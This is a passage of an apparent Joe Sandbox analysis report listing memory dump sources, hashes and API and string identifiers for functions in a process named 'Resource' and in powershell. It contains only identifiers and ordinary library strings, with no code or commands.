                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3416D36B0AB81A6E7789B25E5403B973A0FB48BC1F444071CB9E07755DF38E461CB15
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126570
                                                                                                                                                                                                                                                              • String ID: _constructors$openssl_
                                                                                                                                                                                                                                                              • API String ID: 800424832-3359357282
                                                                                                                                                                                                                                                              • Opcode ID: fdbd83122f0dac6fa34e242b90a95b765f46311265684fcaef058b369bd0f759
                                                                                                                                                                                                                                                              • Instruction ID: dc9a299f12cd0a06498194a1c8774421a2c9511805a1d6b7bdee6ed98500e859
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdbd83122f0dac6fa34e242b90a95b765f46311265684fcaef058b369bd0f759
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57411D65A09B4381EA558B6EA8541BD23A0BF4ABE1B4D4235DF5E0E77CEF3CE4458380
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                                                              • API String ID: 0-402823876
                                                                                                                                                                                                                                                              • Opcode ID: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                                                                                              • Instruction ID: 575c64fcf1165c1cf7932d8e0fadfd63ce44d438e242705976532b2ebad96681
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F419A25A1EAC2A2FB44AF21D8517E962E0FFC87C4F855036EA0C8779ADF7CE1418700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007A4110
                                                                                                                                                                                                                                                              • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                                                              • API String ID: 1315851536-4266787399
                                                                                                                                                                                                                                                              • Opcode ID: 063dfc5a6e16dcd6737886e3f8c9b3bd8e287232609a3123cf02d133cf752103
                                                                                                                                                                                                                                                              • Instruction ID: d164eb4e59abdde971d9a6796a4523a4bae45a0fe49453e7b24f2925a5ab8a92
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 063dfc5a6e16dcd6737886e3f8c9b3bd8e287232609a3123cf02d133cf752103
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9310C62A08B8282EA10DB15E8503BD63A0FB89BD4F595335DE5E4AB68DF3CE595C700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                              • Opcode ID: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                                                                                                              • Instruction ID: 4ffdc91b3df20a81d462d05ac4afc897d13b5d2ee66091061d43b140310b4454
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E21A572A0D6C696EB94CF29D8003B976E8EB88BD4F449035DA5DCB799DE7CD1408B40
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                              • Opcode ID: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
                                                                                                                                                                                                                                                              • Instruction ID: efc43dd88305754dbfa29b6e507cc383ab8e63119737a36e3d8ee5d2e465f8be
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91012BE2B1998552EB64DF25F80115567E0FBCC7C4B44D032E65DCBB59EE2CD1018700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: getprotobyname
                                                                                                                                                                                                                                                              • String ID: protocol not found$s:getprotobyname
                                                                                                                                                                                                                                                              • API String ID: 402843736-630402058
                                                                                                                                                                                                                                                              • Opcode ID: ac4d7443135ec3fd7d6ef97bafa26f56281c3eb87892640fc47bc7d9a40971c8
                                                                                                                                                                                                                                                              • Instruction ID: 28cfde71085612df4403a8f41865402385e6fd5bd04826cf3063898b305c645f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac4d7443135ec3fd7d6ef97bafa26f56281c3eb87892640fc47bc7d9a40971c8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 810104A5A19B8A82EB049B19E99403E63A0FF88FD5F541031DB4E63634DF3CF054C300
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: if_nametoindex
                                                                                                                                                                                                                                                              • String ID: O&:if_nametoindex$no interface with this name
                                                                                                                                                                                                                                                              • API String ID: 3183282855-3835682882
                                                                                                                                                                                                                                                              • Opcode ID: 96cc5bbd212ee31c6da8f769fa9eb41f3bd4693fa012e78c2a94fee3505b7c80
                                                                                                                                                                                                                                                              • Instruction ID: f8b45983961ed50c45e69bae653e185d10d89dc1bdc6d6d7665d0739244d37bd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96cc5bbd212ee31c6da8f769fa9eb41f3bd4693fa012e78c2a94fee3505b7c80
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301E8E1A0CB8B82EB109B29E89107D2360BF88FC9B500431DB4EA7234DE3CF459C710
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: inet_ntoa
                                                                                                                                                                                                                                                              • String ID: packed IP wrong length for inet_ntoa$y*:inet_ntoa
                                                                                                                                                                                                                                                              • API String ID: 1879540557-3027498899
                                                                                                                                                                                                                                                              • Opcode ID: fb079eef545712c8b6bd07bbbbfc0f79a2b8e4f0d6572cd66a148abd21c5c037
                                                                                                                                                                                                                                                              • Instruction ID: 1e5c240730af168a0fe8d044490bf0b9da495c68addce06bdfff6f32cbfe71b2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb079eef545712c8b6bd07bbbbfc0f79a2b8e4f0d6572cd66a148abd21c5c037
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F01C8A1A08B8A86EB109B29E89407D23A0FF88FC9F940131DB4E53674DE3CF549C700
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2a59e9974c6555634f106039553276b550cd824937975b67364f603732ff51e0
                                                                                                                                                                                                                                                              • Instruction ID: 7fbc745204c8c82f63f65221b202fc77f586c089b050e2156470931071fe33fb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a59e9974c6555634f106039553276b550cd824937975b67364f603732ff51e0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52820831D1DBCA9FEB96A73858551B83FE2EF56660B0901FBC84DC71E3D9189C068392
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: aafad5d7cde631a3d56d9322cbc9b8af926bddd5a1b201276d42befc04261df6
                                                                                                                                                                                                                                                              • Instruction ID: 9a93f8933462d77e5426a2f45b57c35f22fcbdc065cf17c908b36da571b333cc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aafad5d7cde631a3d56d9322cbc9b8af926bddd5a1b201276d42befc04261df6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EED13531E2DA8A9FEBA5BB2858155B97FE2EF16790B0801FED04DC70D3DA18AC05C351
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 77156b6cfef870d9e0cf93ef81d9410687c617d565f254adfc2f7dfe20bdf1ea
                                                                                                                                                                                                                                                              • Instruction ID: 244a16805e3776602cb2b7f6e1d26740457c79ac2a94d164e3f8a232c731716c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77156b6cfef870d9e0cf93ef81d9410687c617d565f254adfc2f7dfe20bdf1ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F741F63191CB888FDB19DB1C980A6A97FF0EB96711F04426FD49993193DB206856CBC2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2286028488.00007FF8474ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8474ED000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff8474ed000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ee75fffab7667c8361e0d1e505cce46769b4de136b75f98858fe363693a0975d
                                                                                                                                                                                                                                                              • Instruction ID: 42466ae8617b81480313523e10fc0ec5672e2fabfe116f3e5fb49fb6433e7fd1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee75fffab7667c8361e0d1e505cce46769b4de136b75f98858fe363693a0975d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A41347080DBC48FE75ADB3898419623FF0EF52360B1505EFD088CB1A7D629E846C7A2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 07f3aa2043c0e836b16c23035e2bf715ff938d7c2f80c163988267fdfa03c346
                                                                                                                                                                                                                                                              • Instruction ID: b0e9c0c23a1c7c55738ad9fcee2464167fa4442b9bdf630ef49fdcf6375fc73e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07f3aa2043c0e836b16c23035e2bf715ff938d7c2f80c163988267fdfa03c346
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6210932D2EA878FEBA9EB2D94511786FD3EF4139075901BACC4EC7196DE18EC018381
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ac97002ac587445604304f432ffd9f5785bdc6df0b9771567e802143bc596b35
                                                                                                                                                                                                                                                              • Instruction ID: 6a24ec0f13deedae567cc6cfe27b8aade8304f382c85183fbe93ecb940f38690
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac97002ac587445604304f432ffd9f5785bdc6df0b9771567e802143bc596b35
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C21923190CB4C8FDB58DF9C984A7E97BF0EBA9321F00422FD449C3152D674A45ACB91
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 21bd6ac832c1f6192161473110711df78295bec060d00a563d4ecd717e6f99ba
                                                                                                                                                                                                                                                              • Instruction ID: 4d3a64dbc5709b8c12bf4307545ae6e948b6ac1d66ad9b442f0f4c6c160246a2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21bd6ac832c1f6192161473110711df78295bec060d00a563d4ecd717e6f99ba
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC110632D1D5868FEAA5FB28945057C7FD2FF40760B4901BACC4ED7197EA18AC008781
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ed481dc370c1354ac6ed3134fe16395ae8133b41d3705733bbb056607bfa5e8d
                                                                                                                                                                                                                                                              • Instruction ID: 8b8b42726222d2f3ca52418d0dd401dc3c09d9920c3e4e983f4f66247d5c51df
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed481dc370c1354ac6ed3134fe16395ae8133b41d3705733bbb056607bfa5e8d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A811A37180DAC48FDB1ADB3888590A87FB1FF22244B0801DBD448C70A3EA5199198781
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                              • Instruction ID: c1491cdf6655f2431fdc1454143ba792f73c78be7c36f364b32377c467292d69
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E301677111CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3695DA36E882CB45
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: K_^6$K_^<$K_^F$K_^I$K_^J
                                                                                                                                                                                                                                                              • API String ID: 0-3659583007
                                                                                                                                                                                                                                                              • Opcode ID: b51c032d8e036fa40f8934c4fd8bcd85e0c9190da3d2be33bda1ec95d6b239c8
                                                                                                                                                                                                                                                              • Instruction ID: afcc89256b9b6b911ab0d4aa6d1d75ea3e5d2a88db136dee3f0146a441c7cc17
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b51c032d8e036fa40f8934c4fd8bcd85e0c9190da3d2be33bda1ec95d6b239c8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B2124B770D5167FDB027BADB8425DC77A0DB946BA34842B3D258CB543E914B08B8684
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
